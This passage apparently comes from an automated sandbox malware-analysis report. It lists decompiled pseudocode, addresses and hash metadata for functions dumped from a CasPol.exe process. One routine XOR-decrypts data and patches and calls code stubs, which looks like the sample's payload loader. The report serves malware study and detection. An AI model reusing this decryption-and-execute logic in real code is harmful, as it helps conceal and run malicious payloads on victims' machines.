				_t171 = _t173;
				_t174 = _t173 - 0x3c;
				if(_a4 != 0) {
					_t157 = _a8;
					if(_t157 != 0) {
						_push(__esi);
						_t168 = _a12;
						_t98 = _t168[0x7c] ^ _t168[0x78];
						_t134 =  &(_t168[0x78]);
						if(_t157 >= _t98) {
							_t100 = E00401D80();
							_t168[0x4f] = _t168[0x4f] ^  *_t134;
							_t140 = _t168[0x4f];
							_t168[3] = _t100;
							_t102 = _t157 / _t140;
							_t159 = 0;
							_t168[0x86] = _t134;
							_t136 = _a4;
							 *_t168 = _t102;
							_t103 = _t102 * _t140;
							_t168[0x68] = _t103;
							if(_t103 != 0) {
								do {
									_t159 = _t159 + 1;
									 *(_t159 + _t136 - 1) =  *(_t159 + _t136 - 1) ^  *(_t168[0x86]);
									_t155 =  *(_t168[0x86] + 1) ^  *(_t159 + _t136 - 1) & 0x000000ff;
									 *(_t159 + _t136 - 1) = _t155;
									_t148 =  *(_t168[0x86] + 2) ^ _t155;
									 *(_t159 + _t136 - 1) = _t148;
									 *(_t159 + _t136 - 1) =  *(_t168[0x86] + 3) ^ _t148;
								} while (_t159 < _t168[0x68]);
							}
							_t160 = 0;
							if(_t168[0x4f] != 1) {
								do {
									_t123 = L00401C40(1, _t168[0x4f] - 1);
									_t174 = _t174 + 8;
									_t145 = 0;
									while(_t123 !=  *((intOrPtr*)(_t168 + _t145 + 0x24))) {
										_t145 = _t145 + 1;
										if(_t145 <= _t160) {
											continue;
										} else {
											if(_t123 != 0) {
												 *((char*)(_t168 + _t160 + 0x24)) = _t123;
												_t160 = _t160 + 1;
											}
										}
										goto L12;
									}
									L12:
								} while (_t160 < _t168[0x4f] - 1);
							}
							asm("xorps xmm0, xmm0");
							_v64 = 0x5b27409e;
							_v60 = 0x405b5b5b;
							_v56 = 0x962e;
							_v54 = 8;
							asm("movq [ebp-0x31], xmm0");
							asm("movq [ebp-0x29], xmm0");
							_t106 = 0;
							do {
								 *(_t171 + _t106 - 0x3c) =  *(_t171 + _t106 - 0x3c) ^ 0x000000cb;
								_t106 = _t106 + 1;
							} while (_t106 < 0xb);
							_t107 = 0;
							_v8 = 0;
							if(_t168[0x4f] > 0) {
								do {
									_t165 = ( *(_t168 + _t107 + 0x24) & 0x000000ff) *  *_t168 + _t136;
									_t168[0x63] = _t165;
									asm("movq xmm0, [edi]");
									asm("movq [ebp-0x10], xmm0");
									asm("movq xmm0, [edi+0x8]");
									asm("movq [ebp-0x18], xmm0");
									asm("movq xmm0, [edi+0x10]");
									asm("movq [ebp-0x20], xmm0");
									asm("movq xmm0, [ebp-0x3c]");
									asm("movq [edi], xmm0");
									 *((short*)(_t165 + 8)) = _v56;
									 *((char*)(_t165 + 0xa)) = _v54;
									_v12 = _t165;
									 *(_t168[0x63])();
									asm("movq xmm0, [ebp-0x10]");
									asm("movq [edi], xmm0");
									asm("movq xmm0, [ebp-0x18]");
									asm("movq [edi+0x8], xmm0");
									asm("movq xmm0, [ebp-0x20]");
									asm("movq [edi+0x10], xmm0");
									_t166 = 0;
									if( *_t168 > 0) {
										_t138 = _v12;
										do {
											_t166 = _t166 + 1;
											 *(_t166 + _t138 - 1) =  *(_t166 + _t138 - 1) ^ _t168[0x86][0];
											_t153 = _t168[0x86][0] ^  *(_t166 + _t138 - 1) & 0x000000ff;
											 *(_t166 + _t138 - 1) = _t153;
											_t144 = _t168[0x86][0] ^ _t153;
											 *(_t166 + _t138 - 1) = _t144;
											 *(_t166 + _t138 - 1) =  *(_t168[0x86]) ^ _t144;
										} while (_t166 <  *_t168);
									}
									_t136 = _a4;
									_t107 = _v8 + 1;
									_v8 = _t107;
								} while (_t107 < _t168[0x4f]);
							}
							_t98 = E00401D80();
							_t151 = _t168[3];
							_t168[0x7a] = _t98;
							_t92 = _t98 - 2; // -2
							_t161 = _t92;
							if(_t151 != 0 && _t161 != 0 && _t151 < _t161) {
								_t141 = 0;
								_t162 = _t161 - _t151;
								if(_t162 != 0) {
									do {
										_t98 =  *((intOrPtr*)(_t141 + _t151 + 1)) + 0x61;
										 *(_t141 + _t151) =  *(_t141 + _t151) ^ _t98;
										_t141 = _t141 + 1;
									} while (_t141 < _t162);
								}
							}
						}
					}
				}
				return _t98;
			}






































                                                                0x00401798
                                                                0x0040179a
                                                                0x0040179c
                                                                0x004017a1
                                                                0x004017a3
                                                                0x004017aa
                                                                0x004017b1
                                                                0x004017b6
                                                                0x004017bd
                                                                0x004017be
                                                                0x004017c7
                                                                0x004017cd
                                                                0x004017d5
                                                                0x004017db
                                                                0x004017e2
                                                                0x004017e8
                                                                0x004017ee
                                                                0x004017f5
                                                                0x004017f7
                                                                0x004017f9
                                                                0x004017ff
                                                                0x00401802
                                                                0x00401804
                                                                0x00401807
                                                                0x0040180f
                                                                0x00401811
                                                                0x00401817
                                                                0x0040181a
                                                                0x0040182c
                                                                0x0040182e
                                                                0x0040183b
                                                                0x0040183d
                                                                0x0040184c
                                                                0x00401850
                                                                0x00401811
                                                                0x0040185e
                                                                0x00401861
                                                                0x00401863
                                                                0x0040186d
                                                                0x00401872
                                                                0x00401875
                                                                0x00401877
                                                                0x0040187d
                                                                0x00401880
                                                                0x00000000
                                                                0x00401882
                                                                0x00401884
                                                                0x00401886
                                                                0x0040188a
                                                                0x0040188a
                                                                0x00401884
                                                                0x00000000
                                                                0x00401880
                                                                0x0040188b
                                                                0x00401892
                                                                0x00401863
                                                                0x00401896
                                                                0x00401899
                                                                0x004018a0
                                                                0x004018a7
                                                                0x004018ad
                                                                0x004018b1
                                                                0x004018b6
                                                                0x004018bb
                                                                0x004018c0
                                                                0x004018c0
                                                                0x004018c5
                                                                0x004018c6
                                                                0x004018cb
                                                                0x004018cd
                                                                0x004018d6
                                                                0x004018e0
                                                                0x004018ec
                                                                0x004018ee
                                                                0x004018f4
                                                                0x004018fb
                                                                0x00401900
                                                                0x00401905
                                                                0x0040190a
                                                                0x0040190f
                                                                0x00401914
                                                                0x00401919
                                                                0x0040191d
                                                                0x00401924
                                                                0x0040192d
                                                                0x00401930
                                                                0x00401932
                                                                0x00401937
                                                                0x0040193b
                                                                0x00401940
                                                                0x00401945
                                                                0x0040194a
                                                                0x00401952
                                                                0x00401956
                                                                0x00401958
                                                                0x00401960
                                                                0x00401966
                                                                0x0040196a
                                                                0x0040197c
                                                                0x0040197e
                                                                0x0040198b
                                                                0x0040198d
                                                                0x0040199b
                                                                0x0040199f
                                                                0x00401960
                                                                0x004019a6
                                                                0x004019a9
                                                                0x004019aa
                                                                0x004019ad
                                                                0x004018e0
                                                                0x004019b9
                                                                0x004019be
                                                                0x004019c1
                                                                0x004019c7
                                                                0x004019c7
                                                                0x004019cc
                                                                0x004019d6
                                                                0x004019db
                                                                0x004019dd
                                                                0x004019e0
                                                                0x004019e4
                                                                0x004019e6
                                                                0x004019e9
                                                                0x004019ea
                                                                0x004019e0
                                                                0x004019dd
                                                                0x004019cc
                                                                0x004019ef
                                                                0x004019f0
                                                                0x004019f4

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312223010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_400000_CasPol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: [[[@
                                                                • API String ID: 0-1915900897
                                                                • Opcode ID: bf2452841ec8a52e767ca0e35ee9d10767a69407195e395a6cf45bf687ade4d9
                                                                • Instruction ID: 41084b55ac57c2d3c1eabc5a8f697687b7e59c0d76447f44c227e3c118e3a84d
                                                                • Opcode Fuzzy Hash: bf2452841ec8a52e767ca0e35ee9d10767a69407195e395a6cf45bf687ade4d9
                                                                • Instruction Fuzzy Hash: 8571BF71904B859BC712DF78C4D02EAFBF1FF9A300F14865AD4A9A7351D730A684CBA4
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 004017A0 Relevance: 1.4, Strings: 1, Instructions: 177COMMONCrypto
                                                                Download Yara Rule
                                                                C-Code - Quality: 82%
                                                                			E004017A0(intOrPtr _a4, signed int _a8, signed int* _a12) {
				intOrPtr _v8;
				signed int _v12;
				char _v54;
				short _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				signed char _t97;
				signed int _t99;
				signed int _t101;
				signed int _t102;
				void* _t105;
				intOrPtr _t106;
				char _t122;
				signed int _t133;
				intOrPtr _t135;
				signed int _t137;
				signed int _t139;
				void* _t140;
				signed char _t143;
				void* _t144;
				signed char _t147;
				signed int _t150;
				signed char _t152;
				signed char _t154;
				signed int _t156;
				intOrPtr _t158;
				void* _t159;
				void* _t160;
				void* _t161;
				signed int _t164;
				void* _t165;
				signed int* _t167;
				void* _t169;
				void* _t170;

				if(_a4 == 0) {
					return _t97;
				}
				_t156 = _a8;
				if(_t156 == 0) {
					L27:
					return _t97;
				}
				_t167 = _a12;
				_t97 = _t167[0x7c] ^ _t167[0x78];
				_t133 =  &(_t167[0x78]);
				if(_t156 < _t97) {
					L26:
					goto L27;
				}
				_t99 = E00401D80();
				_t167[0x4f] = _t167[0x4f] ^  *_t133;
				_t139 = _t167[0x4f];
				_t167[3] = _t99;
				_t101 = _t156 / _t139;
				_t158 = 0;
				_t167[0x86] = _t133;
				_t135 = _a4;
				 *_t167 = _t101;
				_t102 = _t101 * _t139;
				_t167[0x68] = _t102;
				if(_t102 == 0) {
					L5:
					_t159 = 0;
					if(_t167[0x4f] == 1) {
						L12:
						asm("xorps xmm0, xmm0");
						_v64 = 0x5b27409e;
						_v60 = 0x405b5b5b;
						_v56 = 0x962e;
						_v54 = 8;
						asm("movq [ebp-0x31], xmm0");
						asm("movq [ebp-0x29], xmm0");
						_t105 = 0;
						do {
							 *(_t169 + _t105 - 0x3c) =  *(_t169 + _t105 - 0x3c) ^ 0x000000cb;
							_t105 = _t105 + 1;
						} while (_t105 < 0xb);
						_t106 = 0;
						_v8 = 0;
						if(_t167[0x4f] <= 0) {
							L20:
							_t97 = E00401D80();
							_t150 = _t167[3];
							_t167[0x7a] = _t97;
							_t92 = _t97 - 2; // -2
							_t160 = _t92;
							if(_t150 != 0 && _t160 != 0 && _t150 < _t160) {
								_t140 = 0;
								_t161 = _t160 - _t150;
								if(_t161 == 0) {
									goto L26;
								}
								do {
									_t97 =  *((intOrPtr*)(_t140 + _t150 + 1)) + 0x61;
									 *(_t140 + _t150) =  *(_t140 + _t150) ^ _t97;
									_t140 = _t140 + 1;
								} while (_t140 < _t161);
							}
							goto L26;
						}
						do {
							_t164 = ( *(_t167 + _t106 + 0x24) & 0x000000ff) *  *_t167 + _t135;
							_t167[0x63] = _t164;
							asm("movq xmm0, [edi]");
							asm("movq [ebp-0x10], xmm0");
							asm("movq xmm0, [edi+0x8]");
							asm("movq [ebp-0x18], xmm0");
							asm("movq xmm0, [edi+0x10]");
							asm("movq [ebp-0x20], xmm0");
							asm("movq xmm0, [ebp-0x3c]");
							asm("movq [edi], xmm0");
							 *((short*)(_t164 + 8)) = _v56;
							 *((char*)(_t164 + 0xa)) = _v54;
							_v12 = _t164;
							 *(_t167[0x63])();
							asm("movq xmm0, [ebp-0x10]");
							asm("movq [edi], xmm0");
							asm("movq xmm0, [ebp-0x18]");
							asm("movq [edi+0x8], xmm0");
							asm("movq xmm0, [ebp-0x20]");
							asm("movq [edi+0x10], xmm0");
							_t165 = 0;
							if( *_t167 <= 0) {
								goto L19;
							}
							_t137 = _v12;
							do {
								_t165 = _t165 + 1;
								 *(_t165 + _t137 - 1) =  *(_t165 + _t137 - 1) ^ _t167[0x86][0];
								_t152 = _t167[0x86][0] ^  *(_t165 + _t137 - 1) & 0x000000ff;
								 *(_t165 + _t137 - 1) = _t152;
								_t143 = _t167[0x86][0] ^ _t152;
								 *(_t165 + _t137 - 1) = _t143;
								 *(_t165 + _t137 - 1) =  *(_t167[0x86]) ^ _t143;
							} while (_t165 <  *_t167);
							L19:
							_t135 = _a4;
							_t106 = _v8 + 1;
							_v8 = _t106;
						} while (_t106 < _t167[0x4f]);
						goto L20;
					} else {
						goto L6;
					}
					do {
						L6:
						_t122 = L00401C40(1, _t167[0x4f] - 1);
						_t170 = _t170 + 8;
						_t144 = 0;
						while(_t122 !=  *((intOrPtr*)(_t167 + _t144 + 0x24))) {
							_t144 = _t144 + 1;
							if(_t144 <= _t159) {
								continue;
							}
							if(_t122 != 0) {
								 *((char*)(_t167 + _t159 + 0x24)) = _t122;
								_t159 = _t159 + 1;
							}
							goto L11;
						}
						L11:
					} while (_t159 < _t167[0x4f] - 1);
					goto L12;
				} else {
					goto L4;
				}
				do {
					L4:
					_t158 = _t158 + 1;
					 *(_t158 + _t135 - 1) =  *(_t158 + _t135 - 1) ^  *(_t167[0x86]);
					_t154 =  *(_t167[0x86] + 1) ^  *(_t158 + _t135 - 1) & 0x000000ff;
					 *(_t158 + _t135 - 1) = _t154;
					_t147 =  *(_t167[0x86] + 2) ^ _t154;
					 *(_t158 + _t135 - 1) = _t147;
					 *(_t158 + _t135 - 1) = _t167[0x86][0] ^ _t147;
				} while (_t158 < _t167[0x68]);
				goto L5;
			}





































                                                                0x004017aa
                                                                0x004019f4
                                                                0x004019f4
                                                                0x004017b1
                                                                0x004017b6
                                                                0x004019f0
                                                                0x00000000
                                                                0x004019f0
                                                                0x004017be
                                                                0x004017c7
                                                                0x004017cd
                                                                0x004017d5
                                                                0x004019ee
                                                                0x00000000
                                                                0x004019ef
                                                                0x004017db
                                                                0x004017e2
                                                                0x004017e8
                                                                0x004017ee
                                                                0x004017f5
                                                                0x004017f7
                                                                0x004017f9
                                                                0x004017ff
                                                                0x00401802
                                                                0x00401804
                                                                0x00401807
                                                                0x0040180f
                                                                0x00401858
                                                                0x0040185e
                                                                0x00401861
                                                                0x00401896
                                                                0x00401896
                                                                0x00401899
                                                                0x004018a0
                                                                0x004018a7
                                                                0x004018ad
                                                                0x004018b1
                                                                0x004018b6
                                                                0x004018bb
                                                                0x004018c0
                                                                0x004018c0
                                                                0x004018c5
                                                                0x004018c6
                                                                0x004018cb
                                                                0x004018cd
                                                                0x004018d6
                                                                0x004019b9
                                                                0x004019b9
                                                                0x004019be
                                                                0x004019c1
                                                                0x004019c7
                                                                0x004019c7
                                                                0x004019cc
                                                                0x004019d6
                                                                0x004019db
                                                                0x004019dd
                                                                0x00000000
                                                                0x00000000
                                                                0x004019e0
                                                                0x004019e4
                                                                0x004019e6
                                                                0x004019e9
                                                                0x004019ea
                                                                0x004019e0
                                                                0x00000000
                                                                0x004019cc
                                                                0x004018e0
                                                                0x004018ec
                                                                0x004018ee
                                                                0x004018f4
                                                                0x004018fb
                                                                0x00401900
                                                                0x00401905
                                                                0x0040190a
                                                                0x0040190f
                                                                0x00401914
                                                                0x00401919
                                                                0x0040191d
                                                                0x00401924
                                                                0x0040192d
                                                                0x00401930
                                                                0x00401932
                                                                0x00401937
                                                                0x0040193b
                                                                0x00401940
                                                                0x00401945
                                                                0x0040194a
                                                                0x00401952
                                                                0x00401956
                                                                0x00000000
                                                                0x00000000
                                                                0x00401958
                                                                0x00401960
                                                                0x00401966
                                                                0x0040196a
                                                                0x0040197c
                                                                0x0040197e
                                                                0x0040198b
                                                                0x0040198d
                                                                0x0040199b
                                                                0x0040199f
                                                                0x004019a3
                                                                0x004019a6
                                                                0x004019a9
                                                                0x004019aa
                                                                0x004019ad
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00401863
                                                                0x00401863
                                                                0x0040186d
                                                                0x00401872
                                                                0x00401875
                                                                0x00401877
                                                                0x0040187d
                                                                0x00401880
                                                                0x00000000
                                                                0x00000000
                                                                0x00401884
                                                                0x00401886
                                                                0x0040188a
                                                                0x0040188a
                                                                0x00000000
                                                                0x00401884
                                                                0x0040188b
                                                                0x00401892
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00401811
                                                                0x00401811
                                                                0x00401817
                                                                0x0040181a
                                                                0x0040182c
                                                                0x0040182e
                                                                0x0040183b
                                                                0x0040183d
                                                                0x0040184c
                                                                0x00401850
                                                                0x00000000

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312223010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_400000_CasPol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: [[[@
                                                                • API String ID: 0-1915900897
                                                                • Opcode ID: 3bab81cb22c670ba8c2558139e2c5177ac26d8abfd67ee5da1f9d1a83d34915d
                                                                • Instruction ID: 0579f95510c03a9841d28313c01d359dcd6b4f96fcd7d691669e6104c2243552
                                                                • Opcode Fuzzy Hash: 3bab81cb22c670ba8c2558139e2c5177ac26d8abfd67ee5da1f9d1a83d34915d
                                                                • Instruction Fuzzy Hash: 3671AF71904B859BC712DF78C0D02EAFBF1FF9A300F14865AD499A7351D730A585CBA4
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 016F0EA5 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 80%
                                                                			E016F0EA5(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v64;
				void* __ebx;
				void* __edi;
				signed int _t58;
				unsigned int _t60;
				intOrPtr _t62;
				char* _t67;
				char* _t69;
				void* _t80;
				void* _t83;
				intOrPtr _t93;
				intOrPtr _t115;
				char _t117;
				void* _t120;

				_t83 = __edx;
				_t117 = 0;
				_t120 = __ecx;
				_v44 = 0;
				if(E016EFF69(__ecx,  &_v44,  &_v32) < 0) {
					L24:
					_t109 = _v44;
					if(_v44 != 0) {
						E016F1074(_t83, _t120, _t109, _t117, _t117);
					}
					L26:
					return _t117;
				}
				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
				_t5 = _t83 + 1; // 0x1
				_v36 = _t5 << 0xc;
				_v40 = _t93;
				_t58 =  *(_t93 + 0xc) & 0x40000000;
				asm("sbb ebx, ebx");
				_t83 = ( ~_t58 & 0x0000003c) + 4;
				if(_t58 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t93);
					_push(0xffffffff);
					_t80 = E01669730();
					_t115 = _v64;
					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
						_push(_t93);
						E016EA80D(_t115, 1, _v20, _t117);
						_t83 = 4;
					}
				}
				if(E016EA854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
					goto L24;
				}
				_t60 = _v32;
				_t97 = (_t60 != 0x100000) + 1;
				_t83 = (_v44 -  *0x1718b04 >> 0x14) + (_v44 -  *0x1718b04 >> 0x14);
				_v28 = (_t60 != 0x100000) + 1;
				_t62 = _t83 + (_t60 >> 0x14) * 2;
				_v40 = _t62;
				if(_t83 >= _t62) {
					L10:
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					if(E01647D50() == 0) {
						_t67 = 0x7ffe0380;
					} else {
						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E016E138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
					}
					if(E01647D50() == 0) {
						_t69 = 0x7ffe0388;
					} else {
						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t69 != 0) {
						E016DFEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
					}
					if(( *0x1718724 & 0x00000008) != 0) {
						E016E52F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
					}
					_t117 = _v44;
					goto L26;
				}
				while(E016F15B5(0x1718ae4, _t83, _t97, _t97) >= 0) {
					_t97 = _v28;
					_t83 = _t83 + 2;
					if(_t83 < _v40) {
						continue;
					}
					goto L10;
				}
				goto L24;
			}
























                                                                0x016f0eb7
                                                                0x016f0eb9
                                                                0x016f0ec0
                                                                0x016f0ec2
                                                                0x016f0ecd
                                                                0x016f105b
                                                                0x016f105b
                                                                0x016f1061
                                                                0x016f1066
                                                                0x016f1066
                                                                0x016f106b
                                                                0x016f1073
                                                                0x016f1073
                                                                0x016f0ed3
                                                                0x016f0ed6
                                                                0x016f0edc
                                                                0x016f0ee0
                                                                0x016f0ee7
                                                                0x016f0ef0
                                                                0x016f0ef5
                                                                0x016f0efa
                                                                0x016f0efc
                                                                0x016f0efd
                                                                0x016f0f03
                                                                0x016f0f04
                                                                0x016f0f06
                                                                0x016f0f07
                                                                0x016f0f09
                                                                0x016f0f0e
                                                                0x016f0f14
                                                                0x016f0f23
                                                                0x016f0f2d
                                                                0x016f0f34
                                                                0x016f0f34
                                                                0x016f0f14
                                                                0x016f0f52
                                                                0x00000000
                                                                0x00000000
                                                                0x016f0f58
                                                                0x016f0f73
                                                                0x016f0f74
                                                                0x016f0f79
                                                                0x016f0f7d
                                                                0x016f0f80
                                                                0x016f0f86
                                                                0x016f0fab
                                                                0x016f0fb5
                                                                0x016f0fc6
                                                                0x016f0fd1
                                                                0x016f0fe3
                                                                0x016f0fd3
                                                                0x016f0fdc
                                                                0x016f0fdc
                                                                0x016f0feb
                                                                0x016f1009
                                                                0x016f1009
                                                                0x016f1015
                                                                0x016f1027
                                                                0x016f1017
                                                                0x016f1020
                                                                0x016f1020
                                                                0x016f102f
                                                                0x016f103c
                                                                0x016f103c
                                                                0x016f1048
                                                                0x016f1050
                                                                0x016f1050
                                                                0x016f1055
                                                                0x00000000
                                                                0x016f1055
                                                                0x016f0f88
                                                                0x016f0f9e
                                                                0x016f0fa2
                                                                0x016f0fa9
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x016f0fa9
                                                                0x00000000

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: `
                                                                • API String ID: 0-2679148245
                                                                • Opcode ID: f4d7f175287be0bb066c2340010f7fdb012ab99dab798cdb7251eea1ac990e0c
                                                                • Instruction ID: 829cfeedf9c29a5831d429f0bc2e8dedaf21c81c6750806468f8d247a39fa4f1
                                                                • Opcode Fuzzy Hash: f4d7f175287be0bb066c2340010f7fdb012ab99dab798cdb7251eea1ac990e0c
                                                                • Instruction Fuzzy Hash: 08519D713043829FD324DF28DD84B1BBBE6EB85754F040A6CFA9697291DB70E805CB62
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0165F0BF Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 75%
                                                                			E0165F0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E01644120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E01669830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E01669990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E016695D0();
							goto L11;
						} else {
							_t109 = L01644620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								E0166F3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E016695D0();
										L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

























                                                                0x0165f0d3
                                                                0x0165f0d9
                                                                0x0165f0e0
                                                                0x0165f0e7
                                                                0x0165f0f2
                                                                0x0165f0f4
                                                                0x0165f0f8
                                                                0x0165f100
                                                                0x0165f108
                                                                0x0165f10d
                                                                0x0165f115
                                                                0x0165f116
                                                                0x0165f11f
                                                                0x0165f123
                                                                0x0165f124
                                                                0x0165f12c
                                                                0x0165f130
                                                                0x0165f134
                                                                0x0165f13d
                                                                0x0165f144
                                                                0x0165f14b
                                                                0x0165f152
                                                                0x0169bab0
                                                                0x0169bab0
                                                                0x0165f158
                                                                0x0165f158
                                                                0x0165f15a
                                                                0x0165f160
                                                                0x0165f165
                                                                0x0165f166
                                                                0x0165f16f
                                                                0x0165f173
                                                                0x0169baa7
                                                                0x0169baa7
                                                                0x0169baab
                                                                0x00000000
                                                                0x0165f179
                                                                0x0165f18d
                                                                0x0165f191
                                                                0x0169baa2
                                                                0x00000000
                                                                0x0165f197
                                                                0x0165f19b
                                                                0x0165f1a2
                                                                0x0165f1a9
                                                                0x0165f1af
                                                                0x0165f1b2
                                                                0x0165f1b6
                                                                0x0165f1b9
                                                                0x0165f1c4
                                                                0x0165f1d8
                                                                0x0165f1df
                                                                0x0165f1e3
                                                                0x0165f1eb
                                                                0x0165f1ee
                                                                0x0165f1f4
                                                                0x0165f20f
                                                                0x0169bab7
                                                                0x0169babb
                                                                0x0169bacc
                                                                0x0169bad1
                                                                0x0165f215
                                                                0x0165f218
                                                                0x0165f226
                                                                0x0165f22b
                                                                0x00000000
                                                                0x0165f22b
                                                                0x0165f1f6
                                                                0x0165f1f6
                                                                0x0165f1f9
                                                                0x0165f1fb
                                                                0x0165f1fb
                                                                0x0165f1f4
                                                                0x0165f191
                                                                0x0165f173
                                                                0x0165f152
                                                                0x0165f203

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: @
                                                                • API String ID: 0-2766056989
                                                                • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                                • Instruction ID: e08b409f409e7132bbdf080632c2292c18c6b2e95213126d04cc9f0440189dbe
                                                                • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                                • Instruction Fuzzy Hash: 66517A71504711AFC320DF69C840A6BBBF9FF48750F00892EFA9597690E7B4E904CBA5
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 016A3540 Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 75%
                                                                			E016A3540(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0x171d360 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
